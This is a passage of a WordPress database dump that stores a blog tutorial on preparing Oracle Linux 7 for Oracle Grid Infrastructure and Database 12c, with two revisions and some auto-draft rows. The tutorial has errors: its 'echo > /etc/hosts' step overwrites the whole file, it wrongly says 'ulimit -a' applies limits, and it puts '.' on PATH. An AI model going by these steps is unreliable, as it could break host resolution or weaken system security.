\"nav_menu[-9]\": {\n \"starter_content\": true,\n \"value\": {\n \"name\": \"Social Links Menu\"\n },\n \"type\": \"nav_menu\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-9]\": {\n \"starter_content\": true,\n \"value\": {\n \"title\": \"Yelp\",\n \"url\": \"https://www.yelp.com\",\n \"position\": 0,\n \"nav_menu_term_id\": -9,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-10]\": {\n \"starter_content\": true,\n \"value\": {\n \"title\": \"Facebook\",\n \"url\": \"https://www.facebook.com/wordpress\",\n \"position\": 1,\n \"nav_menu_term_id\": -9,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-11]\": {\n \"starter_content\": true,\n \"value\": {\n \"title\": \"Twitter\",\n \"url\": \"https://twitter.com/wordpress\",\n \"position\": 2,\n \"nav_menu_term_id\": -9,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-12]\": {\n \"starter_content\": true,\n \"value\": {\n \"title\": \"Instagram\",\n \"url\": \"https://www.instagram.com/explore/tags/wordcamp/\",\n \"position\": 3,\n \"nav_menu_term_id\": -9,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-13]\": {\n \"starter_content\": true,\n \"value\": {\n \"title\": \"Email\",\n \"url\": \"mailto:wordpress@example.com\",\n \"position\": 4,\n \"nav_menu_term_id\": -9,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"twentytwenty::nav_menu_locations[social]\": {\n \"starter_content\": true,\n \"value\": -9,\n \"type\": \"theme_mod\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"show_on_front\": {\n \"starter_content\": true,\n \"value\": \"page\",\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"page_on_front\": {\n \"starter_content\": true,\n \"value\": 5,\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"page_for_posts\": {\n \"starter_content\": true,\n \"value\": 8,\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n }\n}','','','auto-draft','closed','closed','','e32c94d7-321d-4bf4-b967-a12960168d6f','','','2020-02-01 06:13:14','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=9',0,'customize_changeset','',0),
(10,1,'2020-02-02 06:30:20','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 06:30:20','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=10',0,'post','',0),
(11,1,'2020-02-02 06:32:32','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 06:32:32','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=11',0,'post','',0),
(12,1,'2020-02-02 06:34:32','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 06:34:32','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=12',0,'post','',0),
(13,1,'2020-02-02 06:40:23','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 06:40:23','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=13',0,'post','',0),
(14,1,'2020-02-02 07:00:24','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 07:00:24','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=14',0,'post','',0),
(15,1,'2020-02-02 07:17:41','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 07:17:41','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=15',0,'post','',0),
(16,1,'2020-02-02 07:17:44','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 07:17:44','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=16',0,'post','',0),
(24,2,'2020-02-02 08:08:53','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 08:08:53','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=24',0,'post','',0),
(27,2,'2020-02-02 08:28:38','2020-02-02 08:28:38','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code></pre>\n<!-- /wp:code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nfree -b\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n</code></pre>\n<!-- /wp:code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsysctl -p\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\npasswd oracle\npasswd grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></pre>\n<!-- /wp:code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></pre>\n<!-- /wp:code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></pre>\n<!-- /wp:code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nulimit -a \n</code></pre>\n<!-- /wp:code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n</code></pre>\n<!-- /wp:code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></pre>\n<!-- /wp:code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></pre>\n<!-- /wp:code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /home/grid/.bash_profile\n</code></pre>\n<!-- /wp:code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></pre>\n<!-- /wp:code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></pre>\n<!-- /wp:code -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','publish','open','open','','grid-infrastructure-oracle-database-12c-preinstallation-tasks','','','2020-02-02 12:42:19','2020-02-02 12:42:19','',0,'http://ictbank.ir/blog/?p=27',0,'post','',0),
(28,2,'2020-02-02 08:28:50','2020-02-02 08:28:50','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br>\n<code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\n\nyum install kmod-oracleasm -y \nyum install oracleasm-support -y\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br>\n<code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code><br>\nyou may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[list]\n[<em>]SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE\n[</em>]SHMMAX = HALF OF TOTAL RAM IN BYTES\n[*]SHMMNI = PAGE_SIZE[/list]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br>\n<code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br>\n<code>\npasswd oracle\npasswd grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:28:50','2020-02-02 08:28:50','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(29,2,'2020-02-02 08:32:34','2020-02-02 08:32:34','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br>\n<code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\n\nyum install kmod-oracleasm -y \nyum install oracleasm-support -y\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\nSHMALL = TOTAL RAM IN BYTES / PAGE_SIZE\nSHMMAX = HALF OF TOTAL RAM IN BYTES\nSHMMNI = PAGE_SIZE\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br>\n<code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br>\n<code>\npasswd oracle\npasswd grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd 